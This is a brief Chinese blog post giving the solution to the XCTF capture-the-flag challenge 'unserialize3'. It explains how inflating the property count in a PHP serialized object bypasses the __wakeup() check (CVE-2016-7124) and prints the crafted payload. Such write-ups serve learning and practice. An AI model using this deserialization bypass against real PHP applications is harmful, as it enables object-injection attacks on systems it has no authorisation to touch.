美文网首页
unserialize3

unserialize3

作者: Yix1a | 来源:发表于2019-05-30 16:14 被阅读0次

class xctf{ public $flag = '111'; public function __wakeup(){ exit('bad requests'); } ?code=

在code里面输入序列化的xctf,但是有__wakeup(),要绕过__wakeup,
当成员属性数目大于实际数目时可绕过wakeup方法(CVE-2016-7124)
序列化后的值为
O:4:"xctf":1:{s:4:"flag";s:3:"111";}
变为O:4:"xctf":2:{s:4:"flag";s:3:"111";}可绕过

相关文章

  • 攻防世界-unserialize3

    高手进阶区,unserialize3 题目来源:攻防世界[https://adworld.xctf.org.cn/...

  • unserialize3

    class xctf{ public $flag = '111'; public function __wakeu...

  • 攻防世界mfw & unserialize3

    mfw.git源码泄露先用githack下载源码,审一下发现两个assert() 这里两个地方都可以注入,payl...

网友评论

      本文标题:unserialize3

      本文链接:https://www.haomeiwen.com/subject/frpktctx.html